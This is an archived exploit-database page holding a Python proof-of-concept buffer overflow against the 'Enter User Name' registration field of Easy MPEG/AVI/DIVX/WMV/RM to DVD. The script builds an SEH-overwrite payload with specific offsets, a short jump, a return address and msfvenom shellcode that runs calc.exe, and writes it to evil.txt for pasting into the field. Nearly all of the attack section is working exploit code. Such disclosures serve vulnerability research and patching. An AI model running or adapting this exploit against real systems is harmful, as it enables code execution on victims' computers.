Twenty Year Anniversary

Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow

Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow
Posted Oct 25, 2017
Authored by Venkat Rajgor

Easy MPEG/AVI/DIVX/WMV/RM to DVD buffer overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
MD5 | eb38712a65a4d2609d36bab4451b164b

Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow

Change Mirror Download
#!/usr/bin/python

###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 05-10-2017
# Exploit Author: Venkat Rajgor
# Vendor Homepage: http://www.divxtodvd.net/
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of evil.txt
#
##############################################################################
filename="evil.txt"

buffer = "\x41" * 1008 #Buffer

nSEH = "\xEB\x06\x90\x90" #short Jump

SEH = "\x59\x78\x03\x10" #SEH

badchars = "\x00\x0A\x0D\x1A" # Bad Chars

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c # Payload To Pop Calc

shell=(
"\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52"
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61"
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e"
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99"
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f"
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98"
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94"
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23"
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1"
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff"
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59"
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3"
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09"
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96")

evil = "\x90"*20 + shell

buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil


textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    11 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close